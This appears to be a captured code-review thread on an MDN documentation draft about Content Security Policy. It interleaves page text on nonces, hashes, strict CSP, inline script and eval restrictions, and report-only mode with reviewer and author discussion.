- Allowlist CSPs are hard to get right and often policies inadvertently whitelist unsafe domains, and hence don't provide effective protection against XSS (see [CSP Is Dead, Long Live CSP! On the Insecurity of Whitelists and the Future of Content Security Policy](https://dl.acm.org/doi/pdf/10.1145/2976749.2978363)).
- Allowlist CSPs can be very large and hard to maintain. According to [How I learned to stop worrying and love the Content Security Policy](https://www.netlify.com/blog/general-availability-content-security-policy-csp-nonce-integration/), just to integrate Google Analytics, a developer is asked to add 187 Google domains to the allowlist.

A nonce-based strict CSP looks like this:

```http
Content-Security-Policy:

>   script-src 'nonce-{RANDOM}';

Reviewer: 1. What about stylesheets?
2. Should we show a list of nonces here?

Author: > 1. What about stylesheets?
> 

Good question. I just copies this from the web.dev and OWASP articles. One thing that bothers me in general about strict CSP is that it doesn't say anything about controlling other resource types, only JS. @aaronshim , do you know what we should put here?

> 2. Should we show a list of nonces here?

No, because you use the same nonce in every script - it only has to be different for each response.

Reviewer: >  nonce in every script - it only has to be different for each response.

I'm a numpty - does that need to be spelled out, or is it already?

Author: It's indeed not obvious, which is why I did spell it out in an example in https://pr36157.content.dev.mdn.mozit.cloud/en-US/docs/Web/HTTP/CSP#nonces :

<img width="810" alt="Screen Shot 2024-10-18 at 7 39 04 PM" src="https://github.com/user-attachments/assets/4409dde4-ad20-46e3-a528-29c3f1dead90">

Reviewer: Indeed you do. But somehow I missed that. That's probably just on me, but maybe we can repeat this message earlier with something like https://github.com/mdn/content/pull/36157/files#r1807954410

Author: -> https://github.com/mdn/content/pull/36157/commits/131fc0afc2ad959865e5ed541674563ed5743bee and https://github.com/mdn/content/pull/36157/commits/30c4468755670520422fa7271993cb4fd63e210a , a bit different mostly because:
- I thought "This same value may then be included" is less direct than "The server then includes"
- I didn't like "that the developer trusts" - why would the developer include any scripts they don't trust? Point is I think that they include it on all scripts that they _intend to include_ in the document.

Reviewer: Yes I prefer that distinction too.

- navigation requests in nested browsing contexts, such as iframes
- form submissions

However, top-level navigation requests whose target is a different origin will not be upgraded.

For example, suppose the document at `https://example.org` is served with a CSP containing the `upgrade-insecure-requests` directive, and the document contains markup like this:

```html
<script src="http://example.org/my-cat.js"></script>
<script src="http://not-example.org/another-cat.js"></script>
```

The browser will automatically upgrade both of these requests to HTTPS.

Suppose the document also contains this:

```html
<a href="http://example.org/more-cats">See some more cats!</a>
<a href="http://not-example.org/even-more-cats">More cats, on another site!</a>
```

The browser will upgrade the first link to HTTPS, but not the second, as it is navigating to a different origin.

This directive is not a substitute for the {{httpheader("Strict-Transport-Security")}} header (also known as HSTS), because it does not upgrade external links to a site. Sites should include this directive and the `Strict-Transport-Security` header.

## Testing your policy

> 

Reviewer: Below it says 

> The policy is not enforced, but any violations are reported to a provided URI

Maybe

> The policy is not enforced, but any violations are sent to the reporting endpoint specified in the policy.

Author: -> https://github.com/mdn/content/pull/36157/commits/079e4f0b948d5d1ebd33848b003063b8a5a518d0

- [`img-src`](/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/img-src) sets allowed sources for images.

One special fetch directive is `default-src`, which sets a fallback policy for all resources whose directives are not explicitly listed.

For the complete set of fetch directives, see the [reference documentation](/en-US/docs/Web/HTTP/Headers/Content-Security-Policy#fetch_directives).

Each fetch directive is specified as either the single keyword `'none'` or one or more _source expressions_, separated by spaces. When more than one source expression is listed: if any of the methods allow the resource, then the resource is allowed.

For example, the CSP below sets two fetch directives:

- `default-src` is given the single source expression `'self'`
- `img-src` is given two source expressions: `'self'` and `example.com`

![CSP diagram showing source expressions](csp-source-expressions.svg)

The effect of this is that:

- images must be either same-origin with the document, or loaded from `example.com`
- all other resources must be same-origin with the document.

> In the next few sections we'll describe some of the ways you can use source expressions to control resource loads. Note that although we're describing them separately, these expressions can in general be combined: for example, a single fetch directive may include nonces as well as hostnames.

Reviewer: The doc is now nonce/hash centric, but this is still location centric. It might be worth adding a case with a nonce here. Up to you.

Author: I think this is OK, as it's really just intended to show generic fetch directive syntax.

#### Blocking resources

To block a resource type entirely, use the `'none'` keyword. For example, the following directive blocks all {{htmlelement("object")}} and {{htmlelement("embed")}} resources:

```http
Content-Security-Policy: object-src 'none'
```

Note that `'none'` cannot be combined with any other method in a particular directive: in practice, if any other source expressions are given alongside `'none'`, then they are ignored.

#### Nonces

> With a nonce, the server generates a random value for every HTTP response, and includes it in the directive:

Reviewer: Consider taking this note from the end and putting it somehow in the beginning. This is a pretty big restriction, so we want to say "recommended" (hence first) but "can't be used everywhere":

> Note that nonces can only be used for elements that have a nonce attribute: that is, only <script> and <style> elements.

Something like

```suggestion
A `nonce` is the recommended approach for restricting the loading of `<script>` and `<style>` resources.

With a nonce, the server generates a random value for every HTTP response, and includes it in the directive:
```

Author: -> https://github.com/mdn/content/pull/36157/commits/ae79382ca33ef6ec4d6f2b323fcc1edfd66270b6

```http
Content-Security-Policy:
  script-src 'nonce-416d1177-4d12-4e3b-b7c9-f6c409789fb8'
```

> It then includes the same value as the `nonce` attribute of one or more {{htmlelement("script")}} or {{htmlelement("style")}} tags in the document.

Reviewer: As per https://github.com/mdn/content/pull/36157#discussion_r1807165106 it might be good to further spell out that it is one nonce per response used in all tags

```suggestion
This same value may then be included in the `nonce` attribute of all of the {{htmlelement("script")}} and {{htmlelement("style")}} tags in the document that the developer trusts.
```

### XSS and resource loading

A cross-site scripting (XSS) attack is one in which an attacker is able to execute their code in the context of the target website. This code is then able to do anything that the website's own code could do, including, for example:

- access or modify the content of the site's loaded pages
- access or modify content in local storage
- make HTTP requests with the user's credentials, enabling them to impersonate the user or access sensitive data

An XSS attack is possible when a website accepts some input which might have been crafted by an attacker (for example, URL parameters, or a comment on a blog post) and then includes it in the page without _sanitizing_ it: that is, without ensuring that it can't be executed as JavaScript.

Websites should protect themselves against XSS by sanitizing this input before including it in the page. A CSP provides a complementary protection, which can protect the website even if sanitization fails.

> If sanitization does fail, there are various forms the injected malicious code can take in the document, including:

Reviewer 2: minor nit: Is it worth adding `javascript:` URIs as an additional example here? These are tricky because they allow JS injection in link/html contexts even if on* handlers and tag insertion is locked down.

Author: -> https://github.com/mdn/content/pull/36157/commits/6f3cd1b9567bb2d9c5b5f3c783036a7f77d2a0c4

3. appends a prefix identifying the hash algorithm used (one of `sha256-`, `sha384-`, or `sha512-`).

If then adds the result to the directive:

```http
Content-Security-Policy: script-src 'sha256-cd9827ad...'
```

When the browser receives the document, it hashes the script, compares the result with the value from the header, and loads the script only if they match.

External scripts must also include the [`integrity`](/en-US/docs/Web/HTML/Element/script#integrity) attribute for this method to work.

Here's a snippet of Express code, to demonstrate:

```js
const hash1 = "sha256-ex2O7MWOzfczthhKm6azheryNVoERSFrPrdvxRtP8DI=";
const hash2 = "sha256-H/eahVJiG1zBXPQyXX0V6oaxkfiBdmanvfG9eZWSuEc=";

const csp = `script-src '${hash1}' '${hash2}'`;
const content = `
  <script src="./main.js" integrity="${hash2}"></script>
  <script>console.log("hello!");</script>
    <h1>Hello world</h1> 
    `;

app.get("/", (req, res) => {
  res.setHeader("Content-Security-Policy", csp);
  res.send(content);
});
```

Note that:

- We have a separate hash for every script in the document.
- For the external script "main.js", we also include the `integrity` attribute, and give it the same value.

> - Unlike the example using nonces, both the CSP and the content can be static, because the hashes stay the same.

Reviewer 2: minor suggestion: Should we elaborate on this point to explicitly call out the contrast to the point in the nonce-only policy above where nonce-only policies are mentioned to be unsuitable for static pages, clientside-rendered SPAs, etc, and explicitly suggest a hash-based approach for these use cases?

Author: -> https://github.com/mdn/content/pull/36157/commits/2c9204f25f60652bfe8535c5e99fa19b74d324fa

```

#### Inline JavaScript

If a CSP contains either a `default-src` or a `script-src` directive, then inline JavaScript will not be allowed to execute unless extra measures are taken to enable it. This includes:

- JavaScript included inside a `<script>` element in the page:

  ```html
  <script>
    console.log("Hello from an inline script");
  </script>
  ```

- JavaScript in an inline event handler attribute:

  ```html
  <img src="x" onerror="console.log('Hello from an inline event handler')" />
  ```

- JavaScript in a `javascript:` URL:

  ```html
  <a href="javascript:console.log('Hello from a javascript: URL')"></a>
  ```

The `unsafe-inline` keyword can be used to override this restriction. For example, the following directive requires all resources to be same-origin, but allows inline JavaScript:

```http example-bad
Content-Security-Policy: default-src 'self' 'unsafe-inline'
```

> [!WARNING]
> Developers should avoid `'unsafe-inline'`, because it defeats much of the purpose of having a CSP. Inline JavaScript is one of the most common XSS vectors, and one of the most basic goals of a CSP is to prevent its uncontrolled use.

> Inline `<script>` elements are allowed if they are protected by a nonce or a hash, as described above. If a directive contains nonce or hash expressions, then the `unsafe-inline` keyword is ignored by browsers.

Reviewer 2: minor nit: I wonder whether there is a formatting approach to make this warning pop on the page a bit more, similar to the other warnings?

Author: I'm not sure what's for the best here. I think notes and warnings work best when they describe something "out of line" - like a recommendation that's kind of editorializing over the facts, as we do in the warning just above. I think when a note/warning contains substantive information that's part of the main topic, like this, it's maybe paradoxically easy to miss, because people scan warnings/notes and the main text separately.

So what I've done is just add a linebreak so this appears in its own paragraph, and is less easy to miss.

### `eval()` and similar APIs

Like inline JavaScript, if a CSP contains either a `default-src` or a `script-src` directive, then `eval()` and similar APIs will not be allowed to execute. This includes, among other APIs:

- [`eval()`](/en-US/docs/Web/JavaScript/Reference/Global_Objects/eval) itself:

  ```js
  eval('console.log("hello from eval()")');
  ```

- The {{jsxref("Function/Function()", "Function()")}} constructor:

  ```js
  const sum = new Function("a", "b", "return a + b");
  ```

- The string argument to {{domxref("Window.setTimeout()", "setTimeout()")}} and {{domxref("Window.setInterval()", "setInterval()")}}:

  ```js
  setTimeout("console.log('hello from setTimeout')", 1);
  ```

The `unsafe-eval` keyword can be used to override this behavior, and as with `unsafe-inline`, and for the same reasons: **developers should avoid `unsafe-eval`**.

> Unlike `unsafe-inline`, the `unsafe-eval` keyword does still work in a directive that contains nonce or hash expressions.

Reviewer 2: In practice, we have had some difficulty removing `unsafe-eval` from cases where there are legitimate usages, i.e. dynamic module loading-- perhaps this is out of scope, but is it worth mentioning that we can make `unsafe-eval` a bit safer by adopting Trusted Types? (Because TT will be an extra check that the strings fed into `eval` meet some specified policy.)

We can link it in later as well once we have more documentation describing TT.

### Strict CSP

To control script loading as a mitigation against XSS, recommended practice is to use [nonce-](#nonces) or [hash-](#hashes) based fetch directives. This is called a _strict CSP_. This type of CSP has two main advantages over a location-based CSP (usually called an _allowlist CSP_):

- Allowlist CSPs are hard to get right and often policies inadvertently whitelist unsafe domains, and hence don't provide effective protection against XSS (see [CSP Is Dead, Long Live CSP! On the Insecurity of Whitelists and the Future of Content Security Policy](https://dl.acm.org/doi/pdf/10.1145/2976749.2978363)).
- Allowlist CSPs can be very large and hard to maintain, in particular when using scripts that are outside of your control. According to [How I learned to stop worrying and love the Content Security Policy](https://www.netlify.com/blog/general-availability-content-security-policy-csp-nonce-integration/), just to integrate Google Analytics, a developer is asked to add 187 Google domains to the allowlist.

A nonce-based strict CSP looks like this:

```http
Content-Security-Policy:

>   script-src 'nonce-{RANDOM}';

Reviewer: > > 1. What about stylesheets?
> 
> Good question. I just copies this from the web.dev and OWASP articles. One thing that bothers me in general about strict CSP is that it doesn't say anything about controlling other resource types, only JS. @aaronshim , do you know what we should put here?

@wbamberg It would be good if we can address this (note, I have separated into its own thread and resolved the original).

If we're going to recommend strict CSP we should provide a recommendation for the things it does not cover, even if that is just a note that "strict CSP does not cover other types, and these would normally need to be covered by allowlists".

Other than that I have no more comments. I am approving because because I consider this very much better than the original and I have nothing else to add as a reviewer.

Reviewer 2: In practice, we don't have extensive experience rolling out style-based CSPs the same way we have for nonce-based script-restricting "Strict CSP"s-- partially because of our threat models around style injections-- so we don't have as strong of an opinion on `style-src` restriction. Our priority is getting the awareness around "Strict CSP" (specifically around `script-src`) out there.

- navigation requests in nested browsing contexts, such as iframes
- form submissions

However, top-level navigation requests whose target is a different origin will not be upgraded.

For example, suppose the document at `https://example.org` is served with a CSP containing the `upgrade-insecure-requests` directive, and the document contains markup like this:

```html
<script src="http://example.org/my-cat.js"></script>
<script src="http://not-example.org/another-cat.js"></script>
```

The browser will automatically upgrade both of these requests to HTTPS.

Suppose the document also contains this:

```html
<a href="http://example.org/more-cats">See some more cats!</a>
<a href="http://not-example.org/even-more-cats">More cats, on another site!</a>
```

The browser will upgrade the first link to HTTPS, but not the second, as it is navigating to a different origin.

This directive is not a substitute for the {{httpheader("Strict-Transport-Security")}} header (also known as HSTS), because it does not upgrade external links to a site. Sites should include this directive and the `Strict-Transport-Security` header.

## Testing your policy

> To ease deployment, CSP can be deployed in report-only mode.

Reviewer 2: Is it worth calling out that this is not available as a `<meta>` tag and link it in earlier in the article when we mention `<meta>` tags?

Author: -> https://github.com/mdn/content/pull/36157/commits/7da65cf5a14910932f7f64fdbf673b361797fa62

I didn't add a forward link from the bit about meta tags, because that bit is extremely introductory and I wanted to get an overview for people, without them getting bogged down in details yet.

An alternative that might be better would be to have a separate H2 "Delivering your policy", maybe before "Testing your policy", where we could go into all the details? But I think I would like to do that as a follow-up.

Reviewer 2: Sounds good, thanks-- although I wonder whether how many people will start sending report-only policies through `<meta>` tags and whether even a super quick warning can help save some time here.

Reviewer 2: Never mind, I see the call out right below this thread! Thanks!

If both a {{HTTPHeader("Content-Security-Policy-Report-Only")}} header and a {{HTTPHeader("Content-Security-Policy")}} header are present in the same response, both policies are honored.

> The policy specified in `Content-Security-Policy` headers is enforced while the `Content-Security-Policy-Report-Only` policy generates reports but is not enforced.

Reviewer: `Content-Security-Policy-Report-Only` is a null operation unless `report-to` or `report-uri` is present - worth mentioning?

Author: I would think that's pretty obvious isn't it? What could it possibly do if no reporting endpoint is specified?

Reviewer: It is. I raised this only because I did question the point of the report-only header without the reporting option when I recently updated the reporting API docs. Anyway, I think you can omit since this is covered in the following section. Adding https://github.com/mdn/content/pull/36157/files#r1805651083 might help too.
